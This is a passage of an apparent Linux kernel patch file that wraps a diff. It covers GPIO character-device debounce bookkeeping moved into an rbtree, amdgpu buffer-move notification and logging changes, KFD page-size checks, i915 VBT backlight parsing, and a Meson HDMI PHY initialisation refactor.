+ 	unsigned int reg = type == CTRL_IN ? GPIO_IN_CTRL_BASE : GPIO_OUT_CTRL_BASE;
+ 
+ 	if (gpio >= WCOVE_GPIO_NUM)
+-		return -EOPNOTSUPP;
++		return -ENOTSUPP;
+ 
+ 	return reg + gpio;
+ }
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index e40c93f0960b4..97e8335716b01 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -5,6 +5,7 @@
+ #include <linux/bitmap.h>
+ #include <linux/build_bug.h>
+ #include <linux/cdev.h>
++#include <linux/cleanup.h>
+ #include <linux/compat.h>
+ #include <linux/compiler.h>
+ #include <linux/device.h>
+@@ -12,6 +13,7 @@
+ #include <linux/file.h>
+ #include <linux/gpio.h>
+ #include <linux/gpio/driver.h>
++#include <linux/hte.h>
+ #include <linux/interrupt.h>
+ #include <linux/irqreturn.h>
+ #include <linux/kernel.h>
+@@ -20,11 +22,13 @@
+ #include <linux/mutex.h>
+ #include <linux/pinctrl/consumer.h>
+ #include <linux/poll.h>
++#include <linux/rbtree.h>
++#include <linux/seq_file.h>
+ #include <linux/spinlock.h>
+ #include <linux/timekeeping.h>
+ #include <linux/uaccess.h>
+ #include <linux/workqueue.h>
+-#include <linux/hte.h>
++
+ #include <uapi/linux/gpio.h>
+ 
+ #include "gpiolib.h"
+@@ -463,6 +467,7 @@ static int linehandle_create(struct gpio_device *gdev, void __user *ip)
+ 
+ /**
+  * struct line - contains the state of a requested line
++ * @node: to store the object in supinfo_tree if supplemental
+  * @desc: the GPIO descriptor for this line.
+  * @req: the corresponding line request
+  * @irq: the interrupt triggered in response to events on this GPIO
+@@ -475,6 +480,7 @@ static int linehandle_create(struct gpio_device *gdev, void __user *ip)
+  * @line_seqno: the seqno for the current edge event in the sequence of
+  * events for this line.
+  * @work: the worker that implements software debouncing
++ * @debounce_period_us: the debounce period in microseconds
+  * @sw_debounced: flag indicating if the software debouncer is active
+  * @level: the current debounced physical level of the line
+  * @hdesc: the Hardware Timestamp Engine (HTE) descriptor
+@@ -483,6 +489,7 @@ static int linehandle_create(struct gpio_device *gdev, void __user *ip)
+  * @last_seqno: the last sequence number before debounce period expires
+  */
+ struct line {
++	struct rb_node node;
+ 	struct gpio_desc *desc;
+ 	/*
+ 	 * -- edge detector specific fields --
+@@ -516,6 +523,15 @@ struct line {
+ 	 * -- debouncer specific fields --
+ 	 */
+ 	struct delayed_work work;
++	/*
++	 * debounce_period_us is accessed by debounce_irq_handler() and
++	 * process_hw_ts() which are disabled when modified by
++	 * debounce_setup(), edge_detector_setup() or edge_detector_stop()
++	 * or can live with a stale version when updated by
++	 * edge_detector_update().
++	 * The modifying functions are themselves mutually exclusive.
++	 */
++	unsigned int debounce_period_us;
+ 	/*
+ 	 * sw_debounce is accessed by linereq_set_config(), which is the
+ 	 * only setter, and linereq_get_values(), which can live with a
+@@ -548,6 +564,17 @@ struct line {
+ #endif /* CONFIG_HTE */
+ };
+ 
++/*
++ * a rbtree of the struct lines containing supplemental info.
++ * Used to populate gpio_v2_line_info with cdev specific fields not contained
++ * in the struct gpio_desc.
++ * A line is determined to contain supplemental information by
++ * line_has_supinfo().
++ */
++static struct rb_root supinfo_tree = RB_ROOT;
++/* covers supinfo_tree */
++static DEFINE_SPINLOCK(supinfo_lock);
++
+ /**
+  * struct linereq - contains the state of a userspace line request
+  * @gdev: the GPIO device the line request pertains to
+@@ -560,7 +587,8 @@ struct line {
+  * this line request.  Note that this is not used when @num_lines is 1, as
+  * the line_seqno is then the same and is cheaper to calculate.
+  * @config_mutex: mutex for serializing ioctl() calls to ensure consistency
+- * of configuration, particularly multi-step accesses to desc flags.
++ * of configuration, particularly multi-step accesses to desc flags and
++ * changes to supinfo status.
+  * @lines: the lines held by this line request, with @num_lines elements.
+  */
+ struct linereq {
+@@ -575,6 +603,103 @@ struct linereq {
+ 	struct line lines[];
+ };
+ 
++static void supinfo_insert(struct line *line)
++{
++	struct rb_node **new = &(supinfo_tree.rb_node), *parent = NULL;
++	struct line *entry;
++
++	guard(spinlock)(&supinfo_lock);
++
++	while (*new) {
++		entry = container_of(*new, struct line, node);
++
++		parent = *new;
++		if (line->desc < entry->desc) {
++			new = &((*new)->rb_left);
++		} else if (line->desc > entry->desc) {
++			new = &((*new)->rb_right);
++		} else {
++			/* this should never happen */
++			WARN(1, "duplicate line inserted");
++			return;
++		}
++	}
++
++	rb_link_node(&line->node, parent, new);
++	rb_insert_color(&line->node, &supinfo_tree);
++}
++
++static void supinfo_erase(struct line *line)
++{
++	guard(spinlock)(&supinfo_lock);
++
++	rb_erase(&line->node, &supinfo_tree);
++}
++
++static struct line *supinfo_find(struct gpio_desc *desc)
++{
++	struct rb_node *node = supinfo_tree.rb_node;
++	struct line *line;
++
++	while (node) {
++		line = container_of(node, struct line, node);
++		if (desc < line->desc)
++			node = node->rb_left;
++		else if (desc > line->desc)
++			node = node->rb_right;
++		else
++			return line;
++	}
++	return NULL;
++}
++
++static void supinfo_to_lineinfo(struct gpio_desc *desc,
++				struct gpio_v2_line_info *info)
++{
++	struct gpio_v2_line_attribute *attr;
++	struct line *line;
++
++	guard(spinlock)(&supinfo_lock);
++
++	line = supinfo_find(desc);
++	if (!line)
++		return;
++
++	attr = &info->attrs[info->num_attrs];
++	attr->id = GPIO_V2_LINE_ATTR_ID_DEBOUNCE;
++	attr->debounce_period_us = READ_ONCE(line->debounce_period_us);
++	info->num_attrs++;
++}
++
++static inline bool line_has_supinfo(struct line *line)
++{
++	return READ_ONCE(line->debounce_period_us);
++}
++
++/*
++ * Checks line_has_supinfo() before and after the change to avoid unnecessary
++ * supinfo_tree access.
++ * Called indirectly by linereq_create() or linereq_set_config() so line
++ * is already protected from concurrent changes.
++ */
++static void line_set_debounce_period(struct line *line,
++				     unsigned int debounce_period_us)
++{
++	bool was_suppl = line_has_supinfo(line);
++
++	WRITE_ONCE(line->debounce_period_us, debounce_period_us);
++
++	/* if supinfo status is unchanged then we're done */
++	if (line_has_supinfo(line) == was_suppl)
++		return;
++
++	/* supinfo status has changed, so update the tree */
++	if (was_suppl)
++		supinfo_erase(line);
++	else
++		supinfo_insert(line);
++}
++
+ #define GPIO_V2_LINE_BIAS_FLAGS \
+ 	(GPIO_V2_LINE_FLAG_BIAS_PULL_UP | \
+ 	 GPIO_V2_LINE_FLAG_BIAS_PULL_DOWN | \
+@@ -712,7 +837,7 @@ static enum hte_return process_hw_ts(struct hte_ts_data *ts, void *p)
+ 		line->total_discard_seq++;
+ 		line->last_seqno = ts->seq;
+ 		mod_delayed_work(system_wq, &line->work,
+-		  usecs_to_jiffies(READ_ONCE(line->desc->debounce_period_us)));
++		  usecs_to_jiffies(READ_ONCE(line->debounce_period_us)));
+ 	} else {
+ 		if (unlikely(ts->seq < line->line_seqno))
+ 			return HTE_CB_HANDLED;
+@@ -853,7 +978,7 @@ static irqreturn_t debounce_irq_handler(int irq, void *p)
+ 	struct line *line = p;
+ 
+ 	mod_delayed_work(system_wq, &line->work,
+-		usecs_to_jiffies(READ_ONCE(line->desc->debounce_period_us)));
++		usecs_to_jiffies(READ_ONCE(line->debounce_period_us)));
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -935,7 +1060,7 @@ static int debounce_setup(struct line *line, unsigned int debounce_period_us)
+ 	/* try hardware */
+ 	ret = gpiod_set_debounce(line->desc, debounce_period_us);
+ 	if (!ret) {
+-		WRITE_ONCE(line->desc->debounce_period_us, debounce_period_us);
++		line_set_debounce_period(line, debounce_period_us);
+ 		return ret;
+ 	}
+ 	if (ret != -ENOTSUPP)
+@@ -1014,8 +1139,7 @@ static void edge_detector_stop(struct line *line)
+ 	cancel_delayed_work_sync(&line->work);
+ 	WRITE_ONCE(line->sw_debounced, 0);
+ 	WRITE_ONCE(line->edflags, 0);
+-	if (line->desc)
+-		WRITE_ONCE(line->desc->debounce_period_us, 0);
++	line_set_debounce_period(line, 0);
+ 	/* do not change line->level - see comment in debounced_value() */
+ }
+ 
+@@ -1040,7 +1164,7 @@ static int edge_detector_setup(struct line *line,
+ 		ret = debounce_setup(line, debounce_period_us);
+ 		if (ret)
+ 			return ret;
+-		WRITE_ONCE(line->desc->debounce_period_us, debounce_period_us);
++		line_set_debounce_period(line, debounce_period_us);
+ 	}
+ 
+ 	/* detection disabled or sw debouncer will provide edge detection */
+@@ -1077,17 +1201,31 @@ static int edge_detector_update(struct line *line,
+ 				struct gpio_v2_line_config *lc,
+ 				unsigned int line_idx, u64 edflags)
+ {
++	u64 eflags;
++	int ret;
+ 	u64 active_edflags = READ_ONCE(line->edflags);
+ 	unsigned int debounce_period_us =
+ 			gpio_v2_line_config_debounce_period(lc, line_idx);
+ 
+ 	if ((active_edflags == edflags) &&
+-	    (READ_ONCE(line->desc->debounce_period_us) == debounce_period_us))
++	    (READ_ONCE(line->debounce_period_us) == debounce_period_us))
+ 		return 0;
+ 
+ 	/* sw debounced and still will be...*/
+ 	if (debounce_period_us && READ_ONCE(line->sw_debounced)) {
+-		WRITE_ONCE(line->desc->debounce_period_us, debounce_period_us);
++		line_set_debounce_period(line, debounce_period_us);
++		/*
++		 * ensure event fifo is initialised if edge detection
++		 * is now enabled.
++		 */
++		eflags = edflags & GPIO_V2_LINE_EDGE_FLAGS;
++		if (eflags && !kfifo_initialized(&line->req->events)) {
++			ret = kfifo_alloc(&line->req->events,
++					  line->req->event_buffer_size,
++					  GFP_KERNEL);
++			if (ret)
++				return ret;
++		}
+ 		return 0;
+ 	}
+ 
+@@ -1564,13 +1702,18 @@ static ssize_t linereq_read(struct file *file, char __user *buf,
+ 
+ static void linereq_free(struct linereq *lr)
+ {
++	struct line *line;
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < lr->num_lines; i++) {
+-		if (lr->lines[i].desc) {
+-			edge_detector_stop(&lr->lines[i]);
+-			gpiod_free(lr->lines[i].desc);
+-		}
++		line = &lr->lines[i];
++		if (!line->desc)
++			continue;
++
++		edge_detector_stop(line);
++		if (line_has_supinfo(line))
++			supinfo_erase(line);
++		gpiod_free(line->desc);
+ 	}
+ 	kfifo_free(&lr->events);
+ 	kfree(lr->label);
+@@ -2237,8 +2380,6 @@ static void gpio_desc_to_lineinfo(struct gpio_desc *desc,
+ 	struct gpio_chip *gc = desc->gdev->chip;
+ 	bool ok_for_pinctrl;
+ 	unsigned long flags;
+-	u32 debounce_period_us;
+-	unsigned int num_attrs = 0;
+ 
+ 	memset(info, 0, sizeof(*info));
+ 	info->offset = gpio_chip_hwgpio(desc);
+@@ -2305,14 +2446,6 @@ static void gpio_desc_to_lineinfo(struct gpio_desc *desc,
+ 	else if (test_bit(FLAG_EVENT_CLOCK_HTE, &desc->flags))
+ 		info->flags |= GPIO_V2_LINE_FLAG_EVENT_CLOCK_HTE;
+ 
+-	debounce_period_us = READ_ONCE(desc->debounce_period_us);
+-	if (debounce_period_us) {
+-		info->attrs[num_attrs].id = GPIO_V2_LINE_ATTR_ID_DEBOUNCE;
+-		info->attrs[num_attrs].debounce_period_us = debounce_period_us;
+-		num_attrs++;
+-	}
+-	info->num_attrs = num_attrs;
+-
+ 	spin_unlock_irqrestore(&gpio_lock, flags);
+ }
+ 
+@@ -2418,6 +2551,7 @@ static int lineinfo_get(struct gpio_chardev_data *cdev, void __user *ip,
+ 			return -EBUSY;
+ 	}
+ 	gpio_desc_to_lineinfo(desc, &lineinfo);
++	supinfo_to_lineinfo(desc, &lineinfo);
+ 
+ 	if (copy_to_user(ip, &lineinfo, sizeof(lineinfo))) {
+ 		if (watch)
+@@ -2521,6 +2655,7 @@ static int lineinfo_changed_notify(struct notifier_block *nb,
+ 	chg.event_type = action;
+ 	chg.timestamp_ns = ktime_get_ns();
+ 	gpio_desc_to_lineinfo(desc, &chg.info);
++	supinfo_to_lineinfo(desc, &chg.info);
+ 
+ 	ret = kfifo_in_spinlocked(&cdev->events, &chg, 1, &cdev->wait.lock);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
+index 3bf0e893c07df..f34bc9bb7045a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
+@@ -301,12 +301,15 @@ static struct dma_fence *amdgpu_job_run(struct drm_sched_job *sched_job)
+ 		dma_fence_set_error(finished, -ECANCELED);
+ 
+ 	if (finished->error < 0) {
+-		DRM_INFO("Skip scheduling IBs!\n");
++		dev_dbg(adev->dev, "Skip scheduling IBs in ring(%s)",
++			ring->name);
+ 	} else {
+ 		r = amdgpu_ib_schedule(ring, job->num_ibs, job->ibs, job,
+ 				       &fence);
+ 		if (r)
+-			DRM_ERROR("Error scheduling IBs (%d)\n", r);
++			dev_err(adev->dev,
++				"Error scheduling IBs (%d) in ring(%s)", r,
++				ring->name);
+ 	}
+ 
+ 	job->job_run_counter++;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index cde2fd2f71171..9a111988b7f15 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1222,14 +1222,18 @@ int amdgpu_bo_get_metadata(struct amdgpu_bo *bo, void *buffer,
+  * amdgpu_bo_move_notify - notification about a memory move
+  * @bo: pointer to a buffer object
+  * @evict: if this move is evicting the buffer from the graphics address space
++ * @new_mem: new resource for backing the BO
+  *
+  * Marks the corresponding &amdgpu_bo buffer object as invalid, also performs
+  * bookkeeping.
+  * TTM driver callback which is called when ttm moves a buffer.
+  */
+-void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict)
++void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
++			   bool evict,
++			   struct ttm_resource *new_mem)
+ {
+ 	struct amdgpu_device *adev = amdgpu_ttm_adev(bo->bdev);
++	struct ttm_resource *old_mem = bo->resource;
+ 	struct amdgpu_bo *abo;
+ 
+ 	if (!amdgpu_bo_is_amdgpu_bo(bo))
+@@ -1241,12 +1245,12 @@ void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict)
+ 	amdgpu_bo_kunmap(abo);
+ 
+ 	if (abo->tbo.base.dma_buf && !abo->tbo.base.import_attach &&
+-	    bo->resource->mem_type != TTM_PL_SYSTEM)
++	    old_mem && old_mem->mem_type != TTM_PL_SYSTEM)
+ 		dma_buf_move_notify(abo->tbo.base.dma_buf);
+ 
+-	/* remember the eviction */
+-	if (evict)
+-		atomic64_inc(&adev->num_evictions);
++	/* move_notify is called before move happens */
++	trace_amdgpu_bo_move(abo, new_mem ? new_mem->mem_type : -1,
++			     old_mem ? old_mem->mem_type : -1);
+ }
+ 
+ void amdgpu_bo_get_memory(struct amdgpu_bo *bo, uint64_t *vram_mem,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+index 2ada421e79e4f..6dcd7bab42fbb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+@@ -312,7 +312,9 @@ int amdgpu_bo_set_metadata (struct amdgpu_bo *bo, void *metadata,
+ int amdgpu_bo_get_metadata(struct amdgpu_bo *bo, void *buffer,
+ 			   size_t buffer_size, uint32_t *metadata_size,
+ 			   uint64_t *flags);
+-void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict);
++void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
++			   bool evict,
++			   struct ttm_resource *new_mem);
+ void amdgpu_bo_release_notify(struct ttm_buffer_object *bo);
+ vm_fault_t amdgpu_bo_fault_reserve_notify(struct ttm_buffer_object *bo);
+ void amdgpu_bo_fence(struct amdgpu_bo *bo, struct dma_fence *fence,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+index dfb9d42007730..7afefaa374276 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+@@ -483,14 +483,16 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 
+ 	if (!old_mem || (old_mem->mem_type == TTM_PL_SYSTEM &&
+ 			 bo->ttm == NULL)) {
++		amdgpu_bo_move_notify(bo, evict, new_mem);
+ 		ttm_bo_move_null(bo, new_mem);
+-		goto out;
++		return 0;
+ 	}
+ 	if (old_mem->mem_type == TTM_PL_SYSTEM &&
+ 	    (new_mem->mem_type == TTM_PL_TT ||
+ 	     new_mem->mem_type == AMDGPU_PL_PREEMPT)) {
++		amdgpu_bo_move_notify(bo, evict, new_mem);
+ 		ttm_bo_move_null(bo, new_mem);
+-		goto out;
++		return 0;
+ 	}
+ 	if ((old_mem->mem_type == TTM_PL_TT ||
+ 	     old_mem->mem_type == AMDGPU_PL_PREEMPT) &&
+@@ -500,9 +502,10 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 			return r;
+ 
+ 		amdgpu_ttm_backend_unbind(bo->bdev, bo->ttm);
++		amdgpu_bo_move_notify(bo, evict, new_mem);
+ 		ttm_resource_free(bo, &bo->resource);
+ 		ttm_bo_assign_mem(bo, new_mem);
+-		goto out;
++		return 0;
+ 	}
+ 
+ 	if (old_mem->mem_type == AMDGPU_PL_GDS ||
+@@ -512,8 +515,9 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 	    new_mem->mem_type == AMDGPU_PL_GWS ||
+ 	    new_mem->mem_type == AMDGPU_PL_OA) {
+ 		/* Nothing to save here */
++		amdgpu_bo_move_notify(bo, evict, new_mem);
+ 		ttm_bo_move_null(bo, new_mem);
+-		goto out;
++		return 0;
+ 	}
+ 
+ 	if (bo->type == ttm_bo_type_device &&
+@@ -525,22 +529,23 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 		abo->flags &= ~AMDGPU_GEM_CREATE_CPU_ACCESS_REQUIRED;
+ 	}
+ 
+-	if (adev->mman.buffer_funcs_enabled) {
+-		if (((old_mem->mem_type == TTM_PL_SYSTEM &&
+-		      new_mem->mem_type == TTM_PL_VRAM) ||
+-		     (old_mem->mem_type == TTM_PL_VRAM &&
+-		      new_mem->mem_type == TTM_PL_SYSTEM))) {
+-			hop->fpfn = 0;
+-			hop->lpfn = 0;
+-			hop->mem_type = TTM_PL_TT;
+-			hop->flags = TTM_PL_FLAG_TEMPORARY;
+-			return -EMULTIHOP;
+-		}
++	if (adev->mman.buffer_funcs_enabled &&
++	    ((old_mem->mem_type == TTM_PL_SYSTEM &&
++	      new_mem->mem_type == TTM_PL_VRAM) ||
++	     (old_mem->mem_type == TTM_PL_VRAM &&
++	      new_mem->mem_type == TTM_PL_SYSTEM))) {
++		hop->fpfn = 0;
++		hop->lpfn = 0;
++		hop->mem_type = TTM_PL_TT;
++		hop->flags = TTM_PL_FLAG_TEMPORARY;
++		return -EMULTIHOP;
++	}
+ 
++	amdgpu_bo_move_notify(bo, evict, new_mem);
++	if (adev->mman.buffer_funcs_enabled)
+ 		r = amdgpu_move_blit(bo, evict, new_mem, old_mem);
+-	} else {
++	else
+ 		r = -ENODEV;
+-	}
+ 
+ 	if (r) {
+ 		/* Check that all memory is CPU accessible */
+@@ -555,11 +560,10 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 			return r;
+ 	}
+ 
+-	trace_amdgpu_bo_move(abo, new_mem->mem_type, old_mem->mem_type);
+-out:
+-	/* update statistics */
++	/* update statistics after the move */
++	if (evict)
++		atomic64_inc(&adev->num_evictions);
+ 	atomic64_add(bo->base.size, &adev->num_bytes_moved);
+-	amdgpu_bo_move_notify(bo, evict);
+ 	return 0;
+ }
+ 
+@@ -1505,7 +1509,7 @@ static int amdgpu_ttm_access_memory(struct ttm_buffer_object *bo,
+ static void
+ amdgpu_bo_delete_mem_notify(struct ttm_buffer_object *bo)
+ {
+-	amdgpu_bo_move_notify(bo, false);
++	amdgpu_bo_move_notify(bo, false, NULL);
+ }
+ 
+ static struct ttm_device_funcs amdgpu_bo_driver = {
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index 3f403afd6de83..b0f475d51ae7e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1106,7 +1106,7 @@ static int kfd_ioctl_alloc_memory_of_gpu(struct file *filep,
+ 			goto err_unlock;
+ 		}
+ 		offset = dev->adev->rmmio_remap.bus_addr;
+-		if (!offset) {
++		if (!offset || (PAGE_SIZE > 4096)) {
+ 			err = -ENOMEM;
+ 			goto err_unlock;
+ 		}
+@@ -2215,7 +2215,7 @@ static int criu_restore_memory_of_gpu(struct kfd_process_device *pdd,
+ 			return -EINVAL;
+ 		}
+ 		offset = pdd->dev->adev->rmmio_remap.bus_addr;
+-		if (!offset) {
++		if (!offset || (PAGE_SIZE > 4096)) {
+ 			pr_err("amdgpu_amdkfd_get_mmio_remap_phys_addr failed\n");
+ 			return -ENOMEM;
+ 		}
+@@ -2886,6 +2886,9 @@ static int kfd_mmio_mmap(struct kfd_dev *dev, struct kfd_process *process,
+ 	if (vma->vm_end - vma->vm_start != PAGE_SIZE)
+ 		return -EINVAL;
+ 
++	if (PAGE_SIZE > 4096)
++		return -EINVAL;
++
+ 	address = dev->adev->rmmio_remap.bus_addr;
+ 
+ 	vma->vm_flags |= VM_IO | VM_DONTCOPY | VM_DONTEXPAND | VM_NORESERVE |
+diff --git a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+index 93e40e0a15087..4d2590964a204 100644
+--- a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
++++ b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+@@ -2962,6 +2962,7 @@ static enum bp_result construct_integrated_info(
+ 				result = get_integrated_info_v2_1(bp, info);
+ 				break;
+ 			case 2:
++			case 3:
+ 				result = get_integrated_info_v2_2(bp, info);
+ 				break;
+ 			default:
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hpo_dp_link_encoder.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hpo_dp_link_encoder.c
+index 80dfaa4d4d81e..eb3a4624f781b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hpo_dp_link_encoder.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hpo_dp_link_encoder.c
+@@ -393,6 +393,12 @@ void dcn31_hpo_dp_link_enc_set_throttled_vcp_size(
+ 				x),
+ 			25));
+ 
++	// If y rounds up to integer, carry it over to x.
++	if (y >> 25) {
++		x += 1;
++		y = 0;
++	}
++
+ 	switch (stream_encoder_inst) {
+ 	case 0:
+ 		REG_SET_2(DP_DPHY_SYM32_VC_RATE_CNTL0, 0,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 21b374d121819..5de31961319a2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -222,7 +222,7 @@ static int smu_v13_0_4_system_features_control(struct smu_context *smu, bool en)
+ 	struct amdgpu_device *adev = smu->adev;
+ 	int ret = 0;
+ 
+-	if (!en && !adev->in_s0ix) {
++	if (!en && adev->in_s4) {
+ 		/* Adds a GFX reset as workaround just before sending the
+ 		 * MP1_UNLOAD message to prevent GC/RLC/PMFW from entering
+ 		 * an invalid state.
+diff --git a/drivers/gpu/drm/drm_connector.c b/drivers/gpu/drm/drm_connector.c
+index 27de2a97f1d11..3d18d840ef3b6 100644
+--- a/drivers/gpu/drm/drm_connector.c
++++ b/drivers/gpu/drm/drm_connector.c
+@@ -2707,7 +2707,7 @@ int drm_mode_getconnector(struct drm_device *dev, void *data,
+ 						     dev->mode_config.max_width,
+ 						     dev->mode_config.max_height);
+ 		else
+-			drm_dbg_kms(dev, "User-space requested a forced probe on [CONNECTOR:%d:%s] but is not the DRM master, demoting to read-only probe",
++			drm_dbg_kms(dev, "User-space requested a forced probe on [CONNECTOR:%d:%s] but is not the DRM master, demoting to read-only probe\n",
+ 				    connector->base.id, connector->name);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index 9cc1ef2ca72cc..efbb0cffd3bc9 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -1034,22 +1034,11 @@ parse_lfp_backlight(struct drm_i915_private *i915,
+ 
+ 	panel->vbt.backlight.type = INTEL_BACKLIGHT_DISPLAY_DDI;
+ 	if (i915->display.vbt.version >= 191) {
+-		size_t exp_size;
++		const struct lfp_backlight_control_method *method;
+ 
+-		if (i915->display.vbt.version >= 236)
+-			exp_size = sizeof(struct bdb_lfp_backlight_data);
+-		else if (i915->display.vbt.version >= 234)
+-			exp_size = EXP_BDB_LFP_BL_DATA_SIZE_REV_234;
+-		else
+-			exp_size = EXP_BDB_LFP_BL_DATA_SIZE_REV_191;
+-
+-		if (get_blocksize(backlight_data) >= exp_size) {
+-			const struct lfp_backlight_control_method *method;
+-
+-			method = &backlight_data->backlight_control[panel_type];
+-			panel->vbt.backlight.type = method->type;
+-			panel->vbt.backlight.controller = method->controller;
+-		}
++		method = &backlight_data->backlight_control[panel_type];
++		panel->vbt.backlight.type = method->type;
++		panel->vbt.backlight.controller = method->controller;
+ 	}
+ 
+ 	panel->vbt.backlight.pwm_freq_hz = entry->pwm_freq_hz;
+diff --git a/drivers/gpu/drm/i915/display/intel_vbt_defs.h b/drivers/gpu/drm/i915/display/intel_vbt_defs.h
+index a9f44abfc9fc2..b50cd0dcabda9 100644
+--- a/drivers/gpu/drm/i915/display/intel_vbt_defs.h
++++ b/drivers/gpu/drm/i915/display/intel_vbt_defs.h
+@@ -897,11 +897,6 @@ struct lfp_brightness_level {
+ 	u16 reserved;
+ } __packed;
+ 
+-#define EXP_BDB_LFP_BL_DATA_SIZE_REV_191 \
+-	offsetof(struct bdb_lfp_backlight_data, brightness_level)
+-#define EXP_BDB_LFP_BL_DATA_SIZE_REV_234 \
+-	offsetof(struct bdb_lfp_backlight_data, brightness_precision_bits)
+-
+ struct bdb_lfp_backlight_data {
+ 	u8 entry_size;
+ 	struct lfp_backlight_data_entry data[16];
+diff --git a/drivers/gpu/drm/meson/meson_dw_hdmi.c b/drivers/gpu/drm/meson/meson_dw_hdmi.c
+index 5cd2b2ebbbd33..2c8e978eb9ab9 100644
+--- a/drivers/gpu/drm/meson/meson_dw_hdmi.c
++++ b/drivers/gpu/drm/meson/meson_dw_hdmi.c
+@@ -105,6 +105,8 @@
+ #define HHI_HDMI_CLK_CNTL	0x1cc /* 0x73 */
+ #define HHI_HDMI_PHY_CNTL0	0x3a0 /* 0xe8 */
+ #define HHI_HDMI_PHY_CNTL1	0x3a4 /* 0xe9 */
++#define  PHY_CNTL1_INIT		0x03900000
++#define  PHY_INVERT		BIT(17)
+ #define HHI_HDMI_PHY_CNTL2	0x3a8 /* 0xea */
+ #define HHI_HDMI_PHY_CNTL3	0x3ac /* 0xeb */
+ #define HHI_HDMI_PHY_CNTL4	0x3b0 /* 0xec */
+@@ -129,6 +131,8 @@ struct meson_dw_hdmi_data {
+ 				    unsigned int addr);
+ 	void		(*dwc_write)(struct meson_dw_hdmi *dw_hdmi,
+ 				     unsigned int addr, unsigned int data);
++	u32 cntl0_init;
++	u32 cntl1_init;
+ };
+ 
+ struct meson_dw_hdmi {
+@@ -384,26 +388,6 @@ static int dw_hdmi_phy_init(struct dw_hdmi *hdmi, void *data,
+ 	     drm_mode_is_420_also(display, mode)))
+ 		mode_is_420 = true;
+ 
+-	/* Enable clocks */
+-	regmap_update_bits(priv->hhi, HHI_HDMI_CLK_CNTL, 0xffff, 0x100);
+-
+-	/* Bring HDMITX MEM output of power down */
+-	regmap_update_bits(priv->hhi, HHI_MEM_PD_REG0, 0xff << 8, 0);
+-
+-	/* Bring out of reset */
+-	dw_hdmi->data->top_write(dw_hdmi, HDMITX_TOP_SW_RESET,  0);
+-
+-	/* Enable internal pixclk, tmds_clk, spdif_clk, i2s_clk, cecclk */
+-	dw_hdmi_top_write_bits(dw_hdmi, HDMITX_TOP_CLK_CNTL,
+-			       0x3, 0x3);
+-
+-	/* Enable cec_clk and hdcp22_tmdsclk_en */
+-	dw_hdmi_top_write_bits(dw_hdmi, HDMITX_TOP_CLK_CNTL,
+-			       0x3 << 4, 0x3 << 4);
+-
+-	/* Enable normal output to PHY */
+-	dw_hdmi->data->top_write(dw_hdmi, HDMITX_TOP_BIST_CNTL, BIT(12));
+-
+ 	/* TMDS pattern setup */
+ 	if (mode->clock > 340000 && !mode_is_420) {
+ 		dw_hdmi->data->top_write(dw_hdmi, HDMITX_TOP_TMDS_CLK_PTTN_01,
+@@ -425,20 +409,6 @@ static int dw_hdmi_phy_init(struct dw_hdmi *hdmi, void *data,
+ 	/* Setup PHY parameters */
+ 	meson_hdmi_phy_setup_mode(dw_hdmi, mode, mode_is_420);
+ 
